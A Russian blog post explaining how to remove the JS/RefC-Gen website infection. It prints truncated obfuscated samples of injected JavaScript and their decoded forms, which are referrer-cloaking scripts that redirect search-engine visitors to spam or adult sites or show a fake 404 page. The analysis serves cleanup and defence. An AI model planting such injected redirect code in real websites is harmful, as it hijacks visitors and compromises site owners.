удаление вируса JS/RefC-Gen

Данная пометка говорит о том, что где либо на сайте вставлен вредоносный яваскрипт.
По данным указанным на странице вердиктов Яндекса JSRefC-Gen выглядит так:

eval(unescape('\%76\%61\%72\%20\%72\%20\%3D\%20\%64\%6F\%63\%75\%6D\%65\%6E\%74\%2E\%72\%65\%66\%65\%72\%72\%65\%72\%3B\%69\%66\%20\%28\%72\%2E\%69\%6E
.......
\%64\%69\%76\%20\%73\%74\%79\%6C\%65\%3D\%27\%64\%69\%73\%70\%6C\%61\%79\%3A\%6E\%6F\%6E\%65\%27\%3E\%22\%29\%20\%7D'));

* — часть вредоносного кода удалена для безопасности.

При расшифровке видно, что на странице происходит подстановка постороннего iframe-окна:

var r = document.referrer;if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("bing") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {
document.write('<center><iframe src="//iframe . adultfriendfinder . com/ promo / affiframe. jsp?pid=g842969-pct. sub01&no_click=1&lang=english&BGColor=%23ffffff&TextColor=ff0000&LinkColor=0000ff" scrolling="No" align="MIDDLE" width="80%" height="320" frameborder="No"></iframe></center>')} else { document.title = "404 Not Found";document.write("<h1>Not Found</h1>The requested URL " + location.pathname + " was not found on this server.<hr /><address>Apache/1.3.33 Server at " + location.hostname + " Port 80</address><div style='display:none'></div>") }

Однако при поиске аналогичных случаев заражения, нашлись сайты с таким же вердиктом, но другим вариантом вредоносных вставок:
1.

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c< a ?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=
......
{g.b="a://d.c.f"}',17,17,'|s|indexOf|bing|yahoo|if|google|document|referrer|var|http|location|2013mbtzapatoses|www|aol|com|self'.split('|'),0,{}))
</script>

* — часть вредоносного кода удалена для безопасности.
Расшифрованный вид:

var s=document.referrer;if(s.indexOf("google")>0||s.indexOf("bing")>0||s.indexOf("yahoo")>0||s.indexOf("aol")>0){self.location="//www . 2013mbtzapatoses . com"}

2.

<script>
eval(String.fromCharCode(9,118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,59,10,9,105,102,40,115,46,105,110,100,101,120,79,102,40,34,103,111,111,103,108,101,34,41,62,
.......
10,61,39,104,116,116,112,58,47,47,119,119,119,46,112,97,114,97,106,117,109,112,101,114,115,100,97,110,109,97,114,107,46,110,101,116,47,39,59,10,9,125));
</script>

* — часть вредоносного кода удалена для безопасности.
Расшифрованный вид:

	var s=document.referrer;
	if(s.indexOf("google")>0 || s.indexOf("bing")>0 || s.indexOf("aol")>0 || s.indexOf("yahoo")>0)
	{
	self.location='//www . parajumpersdanmark . net/';
	}

3.

<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e
......
"f://g.h.4"}',19,19,'var|reg|myreg|lailu|com|google|yahoo|bing|document|referrer|RegExp|if|test|location|href|http|www|mbtzapatosp|new'.split('|'),0,{}))
</script>

* — часть вредоносного кода удалена для безопасности.

var lailu=document.referrer;reg="google|yahoo|bing";var myreg=new RegExp(reg);if(myreg.test(lailu)){location.href="//www . mbtzapatosp . com"}

Из кода видно, что это редирект на вредоносный сайт.
Удаляем вредоносный код и жмем кнопку перепроверки в Яндекс-вебмастере.
Причиной является скачивание шаблонов с не качественных ресурсов.
Для профилактики желательно проверить сайт ай-болитом/манулом.

Скажите свое мнение

ваш email не публикуется. обязательно *

;-) :yawn: :whew: :toivo: :tmi: :time: :thinking: :talking: :sweating: :swear: :sun: :star: :smoke: :smirk: :sleepy: :skype: :shock: :shake: :rofl: :rain: :punch: :puke: :poolparty: :pizza: :phone: :party: :oops: :nod: :no: :ninja: :neutral: :nerd: :music: :muscle: :mrgreen: :movie: :mooning: :mmm: :middlefinger: :makeup: :mail: :mad: :lol: :lipssealed: :kiss: :itwashtme: :inlove: :idea: :hi: :heidy: :heart: :headbang: :happy: :handshake: :giggle: :fubar: :flower: :evilgrin: :emo: :dull: :drunk: :drink: :doh: :devil: :dance: :cry: :cool: :coffie: :clapping: :cash: :call: :cake: :bug: :brokenheart: :bow: :blush: :beer: :bear: :bandit: :arrow: :angry: :angel: :^) :???: :?: :-| :-o :-P :-D :-) :-( :!:

 

*

code

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.